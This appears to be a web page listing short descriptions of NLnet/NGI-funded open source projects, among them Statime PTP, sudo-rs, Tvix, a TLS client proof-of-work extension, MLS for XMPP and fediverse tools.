While formal verification of smart contracts gains traction, writing formal specifications can be equally if not more costly than writing code. Spec^2 is a specification inference framework that aims to automatically deduce a high-quality set of specs based on the code only. The inferred specs include both per-transaction pre-post conditions (low-level specs) and invariants on the blockchain-backed storage (high-level specs). Furthermore, the inferred specs should be similar to what experts might develop manually and can be easily examined by people without formal verification training. The funding from NLnet and NGI Assure will be used to prototype Spec^2 against the Move language and infer specifications for Move-based smart contracts.

>> Read more about Dual-level Specification Inference

Statime PTP Master — Statime - Zero-allocation cross-platform Precision Time Protocol

High-precision clock synchronization is becoming increasingly important in application areas such as high precision localization, finance, broadcasting, security protocols, smart grids, and cellular base station transmissions. The Precision Time Protocol (PTP) is widely used for these critical applications and it is therefore important for it to be as secure and reliable as possible.

We have previously developed the first iteration of Statime, an implementation of a PTP slave in the Rust programming language. The outcome of that project is a secure-by-design implementation, leveraging the Rust borrow checker to guarantee memory-safety. With this project, we will expand our implementation in two ways. Firstly, we will expand the feature set to include a PTP master, conforming to the IEEE standard for PTP (the 2019 version, IEEE1588-2019), so we can run a full PTP instance with the memory-safety guarantees that our implementation provides.

Secondly, our implementation will be able to run without an operating system or system allocator. Those properties make the implementation inherently portable and more reliable. Our concrete goal for this second phase is that it runs on the stm32f7 microcontroller, a device with built-in PTP Ethernet support, but otherwise limited capabilities.

>> Read more about Statime PTP Master

Maintenance and portability of sudo-rs — Make sudo-rs available cross-platform

The sudo and su utilities guard a critical privilege boundary on just about every free and open-source operating system that powers the Internet. Memory safety bugs occur in the original sudo from time to time, and there is only one maintainer to fix them. For these reasons sudo-rs was written: a Rust drop-in replacement for sudo on Linux. For it to be a success, it needs to gain adoption. In this project, we will 1) address bugs and incompatibilities between sudo-rs and sudo and 2) port it to platforms other than Linux, to grow its user base and viability.

>> Read more about Maintenance and portability of sudo-rs

Software Heritage listers + tooling — Performance improvements and new listers/tooling for Software Heritage

Software Heritage's ambition is to collect, preserve, and share all software that is publicly available in source code form. The platform currently list and load more than 200 million free and open source projects. One of the bottlenecks for collecting sources is the speed at which these can be collected. We want to address performance improvements on data discovery and ingestion through the usage of the PyPy interpreter, which should help in reducing CPU bound in highly repetitive area of the Python code responsible for data analysis and validation. To expand the list of existing source code origins we will create new listers and loaders for Dlang, Julia and Elm package managers.

>> Read more about Software Heritage listers + tooling

Threadiverse Reproducible Deployment — Reproducible deployment for Threadiverse servers

Fediverse is more than short form microblogging. The ActivityPub protocol connects all kinds of software for various communication needs. Some of those are concentrated on long blogs and threaded discussion forums. A common understanding of conversations in ActivityPub and their secure and safe-from-spam implementation is being developed in several fediverse projects. This project focuses on stable and documented automated deployment for two of them - Hubzilla and Streams, including interoperability tests. This will support threadiverse standardization efforts, and help to bring features like group photoalbums and full channel portability between instances.

>> Read more about Threadiverse Reproducible Deployment

Client Proof-of-Work in TLS — Mitigation against DoS amplification on the TLS handshake

The computationally expensive nature of asymmetric crypto in TLS makes it vulnerable to denial-of-service attacks. We propose an extension to TLS that mitigates this attack vector, shifting the advantage from the attacker to the defender. The project will deliver a draft spec, mergeable patches for leading TLS libraries, and a measurement report explaining the results.

>> Read more about Client Proof-of-Work in TLS

TrustING — Ultrafast AS-level Public-Key Infrastructure

TrustING is a human-transparent and agile Trust Infrastructure for a Next-Generation Internet. This infrastructure enables any two entities to establish secret keys that can be used to encrypt and authenticate data. The foundation of TrustING is the AS-level Public-Key Infrastructure (PKI) of the SCION Internet Architecture that provides sovereignty (ensuring absence of global kill switches), trust transparency, and algorithm agility, among others.

The TrustING service establishes symmetric keys with other domains in advance, and then relies on those keys to derive keys for local hosts. The core novelty of this approach is the ability to derive keys purely locally on both sides of the communication, without even requiring key transport. By making TrustING a control-plane mechanism offered by the network infrastructure, higher-level applications can make use of it without having to worry about complexities such as exchanging key material or establishing trust.

To show the viability of TrustING, we will implement TLS trust bootstrapping using TrustING and additionally demonstrate the efficiency of TrustING by using it to authenticate SCMP (SCION's equivalent of ICMP) messages.

>> Read more about TrustING

Trust semantic learning and monitoring — Measure on-going trust between interacting agents

Trust semantic learning and monitoring is part of a wide ranging effort to understand trust in network socio-technical systems. The expected outcome of this part is a methodology and proof of concept code library for qualifying and quantifying trust between agents in a network. In IT, trust is often treated as a binary "crypto token", based on some validation test, and developers naively speak of zero trust systems without understanding the depth of what trust really is. But, trust is a deeply social phenomenon, which changes in real time based on social and technical interactions. By applying learning algorithms and data analytics to streamed interactions, this project attempts to qualify and quantify a measure of trust as a way of making realtime risk estimates.

>> Read more about Trust semantic learning and monitoring

Tvix — Alternative Rust-based software build transparency

Tvix is a modern design and implementation of the Nix package manager (GPLv3). It brings a modular architecture in which components such as the build environment or package store are replaceable, which enables new use-cases and platforms. A graph-reduction evaluation model will make it possible to use Nix for package definitions and entire system configurations, its proven and tested use case, as well as for granular build definitions for individual components of software. Tvix will be fully compatible with nixpkgs, the existing package definition set for Nix, letting its users leverage more than a decade of community contributions and making it useful right out-of-the-box.

>> Read more about Tvix

Universal DID Resolver and Registrar — Tooling for decentralized identifiers

The Universal DID Resolver and Registrar are open-source software components that implement Decentralized Identifiers (DIDs). DIDs lie at the heart of an emerging technical and social paradigm known as "self-sovereign identity" (SSI), which allows individuals, organizations, and things to create and manage their digital identities without dependence on any central authority or intermediary. This technology is highly aligned with Next Generation Internet values such as human-centricity, openness, trust, and reliability. DIDs as a building block for protocols are of similar importance to Internet infrastructure as other identifiers such as domain names or e-mail addresses. The Universal DID Resolver and Registrar are aligned with corresponding W3C community group specification efforts. Development and maintainance of the code takes place in close collaboration with relevant community and industry stakeholders such as the Decentralized Identity Foundation, uPort, Jolocom, Sovrin, Civic, Veres One, Blockstack, ERC725 Alliance, etc.

>> Read more about Universal DID Resolver and Registrar

XWiki — Bring wiki capabilities into the Fediverse

XWiki is a modern and extensible open source wiki platform. Up until now, XWiki had been focusing on providing the best collaboration experience and features to its users. We're now taking this to the next level by having XWiki be part of the larger federation of collaboration and social software (a.k.a. fediverse), thus allowing users to collaborate externally. XWiki is embracing the W3C ActivityPub specification. Specifically we're implementing the server part of the specification, to be able to both view activity and content happening in external services inside XWiki itself and to make XWiki's activity and content available from these other services too. A specific but crucial use case, is to allow content collaboration between different XWiki servers, sharing content and activity.

>> Read more about XWiki

Wispwot — Implement generalized scalable protection against disruptive behavior in content discovery

Spam and intentional disruption are a major problem in the clearnet. They make it infeasible to have comments on websites without moderation teams, privacy invading humanity checking, and access-restrictions, and they force social networks to decide between invasive censorship and exposing their community to abuse, propaganda and targeted harassment. The core of the problem is that spam scales better than spam-blocking.

This project brings the spam-defense from the Hyphanet Project to the fediverse. It replaces instant global visibility with incremental local visibility, fueled by positive social interaction and transitive blocking, so spammers quickly become invisible to most. To scale for groups of arbitrary size, it extends the system from Hyphanet by adding pruning of inactive accounts and efficient rediscovery. With this project, spam-protection scales better than spamming, reducing the work needed to cope with hostile communication, so group-communication won’t require the outsourced, underpaid moderation teams that are prevalent in most centralized social networks.

>> Read more about Wispwot

MLS for XMPP — Add Message Layer Security to XMPP

XMPP (Extensible Messaging and Presence Protocol) is an IETF- standardized (RFC 6120/6121) communication protocol designed for instant messaging and other near-real-time exchange of structured data between two or more network entities. MLS (Messaging Layer Security) is an emerging, IETF-standardized (RFC 9420) protocol for end-to-end encryption of messages and a central part of the IETF MIMI (More Instant Messaging Interoperability) effort to allow communication across messaging apps, for example in the context of the EU Digital Markets Act.

This project adds support for MLS encrypted messaging to XMPP group chats. This includes creating a prototype implementation, standardizing an XMPP Extension Protocol (XEP) and introducing support in two existing XMPP clients.

>> Read more about MLS for XMPP